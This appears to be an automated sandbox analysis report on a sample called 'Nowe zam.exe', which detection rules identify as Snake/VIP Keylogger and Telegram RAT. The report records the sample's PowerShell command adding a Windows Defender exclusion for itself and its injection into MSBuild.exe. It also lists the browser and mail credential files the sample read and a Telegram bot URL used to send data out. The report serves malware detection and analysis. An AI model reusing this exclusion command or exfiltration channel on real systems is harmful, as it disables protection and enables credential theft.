Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: Nowe zam.exe, 00000000.00000002.2339393029.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d

Source: C:\Users\user\Desktop\Nowe zam.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_065B9328 LdrInitializeThunk,

4_2_065B9328

Source: C:\Users\user\Desktop\Nowe zam.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"
Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Nowe zam.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Nowe zam.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Nowe zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BF9008	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe	Queries volume information: C:\Users\user\Desktop\Nowe zam.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Nowe zam.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nowe zam.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Disable or Modify Tools	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Nowe zam.exe	24%	ReversingLabs
Nowe zam.exe	100%	Avira	HEUR/AGEN.1309508
Nowe zam.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://mail.tlakovec.si	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
reallyfreegeoip.org	188.114.96.3	true	false	high
mail.tlakovec.si	212.44.112.138	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2007/11/2024%20/%2019:53:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/173.254.250.79	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	Nowe zam.exe, 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a	MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	MSBuild.exe, 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	MSBuild.exe, 00000004.00000002.4773046764.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	MSBuild.exe, 00000004.00000002.4773046764.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002E18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	MSBuild.exe, 00000004.00000002.4775885967.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	false		high
